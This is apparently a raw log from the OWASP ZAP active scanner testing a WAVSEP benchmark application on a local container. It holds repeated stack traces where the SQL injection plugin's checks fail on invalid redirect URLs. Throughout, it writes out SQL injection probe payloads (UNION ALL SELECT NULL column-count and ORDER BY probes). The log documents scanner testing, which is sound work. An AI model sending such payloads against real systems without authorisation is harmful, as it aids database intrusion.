Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681760 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681761 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681761 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681763 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1845-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1845-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681763 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681764 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681764 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681766 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681766 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681767 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681767 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681768 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681768 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at 